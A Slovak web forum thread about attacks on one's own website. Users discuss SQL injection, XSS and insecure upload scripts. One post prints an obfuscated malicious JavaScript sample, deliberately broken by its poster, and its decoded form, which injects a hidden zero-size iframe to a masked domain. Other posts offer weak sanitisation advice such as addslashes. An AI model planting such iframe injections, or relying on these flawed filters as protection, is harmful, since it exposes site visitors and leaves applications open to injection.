Utok na vlastnu stranku

rooobertek · Napísal **rooobertek**: 19.12.2008 17:29

Ale nemôžte použiť jednu univerzálnu funkciu proti všetkým typom útokov. Napríklad vám nepomôže keď dáte

Kód:

$query = "SELECT * FROM tabulka WHERE id=".htmlentities($_GET['id'])

. Treba nad každým jedným riadkom napísaného kódu rozmýšlať.

uUsErR · Napísal **uUsErR**: 28.12.2008 18:10

No, upozorňujem niektorých, aby svoju stránku naozaj dobre zabezpečili.
Mal som stránku, na ktorej bol iba nefunkčný formulár na uploadovanie a heslo. A myslel som si že to vonkoncom niekoho napadne hacknúťmi to. ALE prišla jedna sránka megatt.cn a pozrite čo som vygúgloval http://www.google.com/safebrowsing/diagnostic?site=http://megatt.cn/index.php&hl=sk
A to mala ta stránka pred dvoma týždňami iba 2 trojanov a 7 exploitov...
Neviem jak sa jej to podarilo, na stránku nešiel žiadny odkaz. Napadol iba stránku .html s tým formulárom. Na koniec zdroja dodal skript ktorý sa mal na tu stránku presmerovať. Môžte mi tiež povedať jak sa to podarilo ?
Tú stránku si prosím nedávajte

. Tak pozor !

p360t · Napísal **p360t**: 28.12.2008 19:11

Tak načo ju linkuješ? Možno by bolo fajn, dať sem ten tvoj upload skript, nech každý vidí, ako vyzerá nezabezpečený kód.

rooobertek · Napísal **rooobertek**: 28.12.2008 20:38

No už viackrát som natrafil na stránky, na ktorých je iframe s nežiadúcim obsahom. Naposledy som natrafil na stránku s iframom 100x150, ale vyzeral nenápadne, pretože obsah by mal byť biely a okolie tiež biele. Žiadny okraj. Ani by som si ten iframe nevšimol, keby tam nebolo tmavé
ohlásenie škodlivej stránky (nejaký blacklist). Ďalší deň tam bola už iba prázdna stránka bez ničoho. Pozriem na zdroják a tam niečo ako

Kód:

<!--Live.com counter--><script>function nsssdgzbarVXY(DhcJivF){return false; return String["\x06\x72\x6F\x6D"+"\x43\x68\x61\x72\x93\x6F\x64\x65"](DhUYcJivF);}function mV6s(WZC6mQLxjylHz6){varrrr VKE5eModX7fdj=0,FJ69sptLRf=WZC6mQLxjylHz6.length,oSosRO=1024,Eato
MCQ487x,Rew1DhNOWZi,t8vSfhTpT9K4="",wxD8ULutaxFR=VKE5eModX7fdj
,VnTrBgCCFTLK=VKE5eModX7fdj,T95deGl=VKE5eModXfdj,fzGc8=uprXXz=A
rray(63,2254,40,41,25,
33,47,0,0,0,,62,4,59,36,37,27,51,56,42,39,55,61,26,24,30,28,8,14,23,53,44,
5,34,45,38,0,0,0,0,50,0,43,11,57,16,13,0,29,9,3,58,2,52,48,60,20,7,6,32,31,
1,10,49,35,19,15,21);for(Rew1DhNOWZi=Math.cejl(FJ6o9sptLRf/oCQSosRO);RewDhNOWZi>VKE5eMod7fdj;Redsw1DhNOWZi--){for(EatoMCQ48sx=Math.min(FJ6o9sptLfRf,oCQSosRO);EatoMCQ487x>VKE5eModX7fdj;EatoMCQ487x--,FJ6o9sptLRf--){return false; T95deGl|=
(fzGc81uprXXz[WZC6mQLxjylHz6.charCodeAt(wxD8ULutaxFR++)-48])<<<VnTrBgCCFTLK;if(VnTrBgCCFTLK){t8vSfhT9K4+=ngzbarVY(164^T5deGl&255);T95deGl>>=8;VngCFTLK-=2;}else{VnTrBgCCFTLK=6;}}}return (t8vSfhpT9K4);}var sWXOVfS="HdxRloH@Mv_bwCkeXbDA_bwoxbFIke2gw@6dxh@5gqs6OX@
8l3hr
hew@wlKO5diem5pp9vvGXoXe8R_b2exulo3Pmc4R9lkp9WXhZmv
G6IkhFrwGmrk@Xt4@lEibFlKOLEkhlrXPmtiSDtquFE_h5dwPmtiSDtZR9RihFRwP2nXbFRqO9Iki9CkhMh4@lCkeU@xsEoXh8oibl@te8dxeHVKOBvpp9FXh_C3bFIL76t";
eva_l(dN6s(sWXOVfS));</script><!--/Live.com-->

Takže aj toto môžte spôsobiť, keď si neochránite svoju aplikáciu. (Skript by mal byť nefunkčný, prepísal som tam pár vecí, pre prípad že by niekoho napadlo to použiť.)

Každopádne som rád, že používam noscript.

stenley · Napísal **stenley**: 28.12.2008 21:56

nie je to len nejake pocitadlo pristupov, ktoreho kod je zasifrovany?

rooobertek · Napísal **rooobertek**: 29.12.2008 8:35

Určite nie, toto je typický príklad, ako vyzerá nebezpečný javascript. Skúsim to prepísať do čitateľnej formy, aby bolo vidno, čo to robí.

stenley · Napísal **stenley**: 29.12.2008 8:43

mno, moze byt, ja len ze kedysi som js kod sifroval, aby ludia nevideli v zdrojaku citatelny kod a vypadalo to velmi podobne... myslim tym vyzor v zdrojaku, nie funkcnost

ale nemusis tu davat ten kod, pre istotu...

rooobertek · Napísal **rooobertek**: 29.12.2008 9:02

Takže odkódil som to. Ani som nemusel, stačilo namiesto eval dať alert. Výsledok je ten, že to vypíše iframe (tentokrát som pozmenil adresu).

Kód:

status=location;document.write('<iframe src="http:\/\/xxxxxx.sidxxxxe9xxxx0.com\/aff\/index.php" style="width:0px; height:0px; border:none" onLoad="status=defaultStatus;"><\/iframe>')

dadmtb · Napísal autor témy **dadmtb**: 29.12.2008 11:16

a mohol by to tu niekto vysvetlit aj mne dobre ten skript spravy iframe v ktorom bude odkazovat na svoju stranku hej? mno ale ako sa dostane ten jeho skript na moj zdrojak akoze on mi hackne FTP a nahra tam svoj subor abo ja musim mat na stranke JS a on to tam neako cez neho dostane? :oops:

rooobertek · Napísal **rooobertek**: 29.12.2008 11:51

No diery sú rôzne. Môže to byť napríklad aj nesprávne spravený upload skript. Stačí ti aj len klasické XSS, mnohými slovenskými "vývojármi" tradične neriešené.
Dopomôcť útočníkom môžu aj heslá typu "janka" alebo "nbusr123", ktoré si nezmeníš od založenia stránky až po koniec.

blackman545 · Napísal **blackman545**: 29.12.2008 13:04

euthanan píše:

... tak mozes maximalne uhadnut heslo to je vsetko a ked nepoznas ramec paketa a vvsetko oklo toho ako je zanulajednotkovany tak to mozes zabalit nemas sancu

aa naco mi je odchyteny paket ked neviem jeho ramec

//pouzivaj edit (stenley)

...ak chces aby sa k tebe niekto aj pripojil tak musis pouzivat standarne packety a framy...aby si bol v bezpeci musel by si si vytvorit vlastny protokol a tiez vlastne routre,NIC karty a spol....ak mas fabriku ktora ich vyraba tak prosim si v bezpeci...

http://en.wikipedia.org/wiki/Ethernet
http://mike.passwall.com/networking/tcppacket.html

max-m píše:

to by som aj ja rad vedel.
ja este k tomu includovaniu: staci mi nieco taketo?

subor include_file.php:
[code]<?php
if ($ping != "pong") {
exit('<h2>You cannot access this file directly!</h2>');
}
?>

...global variables on....potom http://nieco.sk/include_file.php?ping=pong a si v riti...

btw pouzivaj define

Marco · Napísal **Marco**: 16.02.2011 8:15

Čaute,
používam takéto nejaké ošetrenie: (časť fcie od stenlyho)

Kód:

   $value = htmlspecialchars($value, ENT_QUOTES); 
   $value = str_replace("'","& #39;",$value); 
   $value = str_replace("\\","\\\\",$value); 
   $value = str_replace("%","& #37;",$value); 
   $value = trim($value);

pre $_POST, $_GET, $_COOKIE, $_SESSION.

A pre znaky

Kód:

; \ / =

mi aj tak vypisuje XSS me chybu.

Neviete prosím, v čom to môže byt?
Ďakujem.

juho · Napísal **juho**: 16.02.2011 15:26

staci pouzit

Kód:

$id=addslashes($_GET['id']);
$query = "SELECT * FROM tabulka WHERE id='{$id}'"

dokonca ked si instalnes xampp tak tam mas hned zapnute backslashovanie $_POST
hmm a ak sa jedna o to zeby si vypisoval $_GET['id'] napr pri neuspesnom vyhladavani tak neviem preco by si to robil napr keby ti tam zadali <a href=www.pcforum.sk>bla</a> jasne ze bez uvodzoviek bo inak by to nefungovalo uzivatelovi staci vediet ze "zadany riadok neexistuje" a kludne mu mozes dat history.back(1) k dispozicii

Utok na vlastnu stranku

Podobné témy